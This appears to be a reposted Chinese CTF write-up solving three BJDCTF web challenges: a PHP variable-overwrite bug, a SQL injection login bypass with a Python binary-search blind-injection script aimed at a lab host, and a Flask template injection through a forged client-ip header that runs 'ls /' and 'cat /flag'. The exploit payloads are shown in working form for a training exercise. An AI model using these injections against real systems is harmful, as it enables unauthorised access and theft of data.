首页 > 其他 > 详细

[BJDCTF2020]Mark loves cat && [BJDCTF 2nd]简单注入 && [BJDCTF2020]The mystery of ip

时间:2020-04-25 12:49:13      阅读:255      评论:0      收藏:0      [点我收藏+]

[BJDCTF2020]Mark loves cat

源码泄露

使用GitHack.py下载源码

技术分享图片

 

 

 下载之后对源代码进行审计

flag.php代码为:

<?php

$flag = file_get_contents(‘/flag‘);

iindex.py里的关键代码为:

<?php
include ‘flag.php‘;
$yds = "dog";
$is = "cat";
$handsome = ‘yds‘;
foreach($_POST as $x => $y){
    $$x = $y;
}
foreach($_GET as $x => $y){
    $$x = $$y;
}
foreach($_GET as $x => $y){
    if($_GET[‘flag‘] === $x && $x !== ‘flag‘){
        exit($handsome);
    }
}
if(!isset($_GET[‘flag‘]) && !isset($_POST[‘flag‘])){
    exit($yds);
}
if($_POST[‘flag‘] === ‘flag‘  || $_GET[‘flag‘] === ‘flag‘){
    exit($is);
}
echo "the flag is: ".$flag;

  观察代码可以看出来是变量覆盖漏洞,代码审计一书中也对变量覆盖漏洞进行过分析

按照常规想要获取到flag,是通过:

echo "the flag is: ".$flag;

  因为包含了flag.php文件,在flag.php文件中包含了网站目录下的flag文件。

但是在这里:

foreach($_GET as $x => $y){
    if($_GET[‘flag‘] === $x && $x !== ‘flag‘){
        exit($handsome);
    }
}

if(!isset($_GET[‘flag‘]) && !isset($_POST[‘flag‘])){
    exit($yds);
}

if($_POST[‘flag‘] === ‘flag‘  || $_GET[‘flag‘] === ‘flag‘){
    exit($is);
}

  可以看到有三个有输出的exit:

exit($handsome);
exit($yds);
exit($is);

找一个最简单的,第二个exit:

if(!isset($_GET[‘flag‘]) && !isset($_POST[‘flag‘])){
    exit($yds);
}

  只要不给flag传值就会退出,退出的时候会显示$yds的值,而$yds的值在代码最开始的时候初始化过:

$yds = "dog";

  初始化和exit之间有代码:

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

  我们只要在这段代码中令$yds=$flag,将原来$yds变量的值进行覆盖,同时符合退出条件,就可以输出拿到flag。

从下往上逆推,思路要清楚一点。

退出条件是不给flag传值,接着要令$yds=$flag

foreach($_GET as $x => $y){
    $$x = $$y;
}

所以我们GET传值

?yds=flag

这样就能达到我们的目的,第一个POST的循环都没有用到。

查看源代码获取flag

技术分享图片

 

 

技术分享图片

 

[BJDCTF 2nd]简单注入

技术分享图片

 

 

 界面是一个登录框,输入admin/123456

技术分享图片

输入一下单引号

技术分享图片

 

 

 存在过滤,扫描发现存在robots.txt文件

技术分享图片

 

 

 继续看hint.txt文件

技术分享图片

 

 

 

Only u input the correct password then u can get the flag
and p3rh4ps wants a girl friend.

select * from users where username=‘$_POST["username"]‘ and password=‘$_POST["password"]‘;

  显示了后端的SQL语句,我们可以使用\转义符转义username后面的引号,令username的第一个引号和password的第一个引号闭合,逃逸出password第一个引号后面的内容

如输入

username=admin\
password=or 1#

  数据库查询语句事实上变成了这样:

select * from users where username=‘admin\‘ and password=‘or 1#‘;

  这时候的回显变为了:

技术分享图片

 

 也就是查询正确的结果和查询错误的结果显示的页面是不一样的,由此编写二分盲注脚本(其实就是在原来的二分盲注脚本基础上改改就行)

不知道为啥,二分脚本里面payload写成这样死活不行:

payload=‘or/**/(ascii(substr((password),%d,1))>%d)#‘%(x,mid)

  手动测试的时候or也没有被过滤,脚本里面就出错了,将or换成了^异或符号

payload=‘^/**/(ascii(substr((password),%d,1))>%d)#‘%(x,mid)

  最后的二分盲注脚本为:

import requests
import time

url=‘http://30e42e1c-74ab-4d1f-82e8-fcfb7562dfe1.node3.buuoj.cn/index.php‘
flag=‘‘
for x in range(1,50):
    high=137
    low=32
    mid=(low+high)//2
    while high>low:
        payload=‘^/**/(ascii(substr((password),%d,1))>%d)#‘%(x,mid)
        data={
            "username":"admin\\",
            "password":payload
            }
        response=requests.post(url,data=data)
        if ‘P3rh4ps‘ in response.text:
            low=mid+1
        else:
            high=mid
        mid=(high+low)//2
    flag+=chr(int(mid))
    print flag
#or (ascii(substr((password),1,1))>1)#

  运行之后拿到密码:

技术分享图片

 

 使用admin/OhyOuFOuNdit登录即可获取flag

技术分享图片

 

 

[BJDCTF2020]The mystery of ip

技术分享图片

 

 进去之后随便点点,先点hint再点flag

技术分享图片

 

 hint页面啥也没有,查看源代码

技术分享图片

 

 有一句 Do you know why i knoe your ip?怀疑是需要伪造IP地址

再看flag页面

技术分享图片

 

为啥我IP在加拿大???

burpsuite拦截,client-ip伪造IP为127.0.0.1

技术分享图片

 

 成功伪造其为127.0.0.1

发现没有什么其他的提示了,尝试了一下SQL注入,无果

这时候可以注意到网站是使用flask框架搭建的--->>因为前端使用了bootstrap框架组件(还好有一点flask开发基础)

技术分享图片

 

 遇到flask框架反应就是SSTI模板注入,题目又是IP的奥秘,伪造IP为:

client-ip: 127.0.0.1/{{1+1}}

  技术分享图片

 

 计算出了1+1之后的值,证明存在SSTI模板注入

继续修改payload:

client-ip: 127.0.0.1/{{system("ls /")}}

技术分享图片

 

 根目录下存在flag文件,cat一下即可

client-ip: 127.0.0.1/{{system("cat /flag")}}

  技术分享图片

 

 获取flag

 

参考链接:

https://www.cnblogs.com/wangtanzhi/p/12318630.html

https://www.cnblogs.com/h3zh1/p/12669345.html

[BJDCTF2020]Mark loves cat && [BJDCTF 2nd]简单注入 && [BJDCTF2020]The mystery of ip

原文:https://www.cnblogs.com/Cl0ud/p/12767897.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!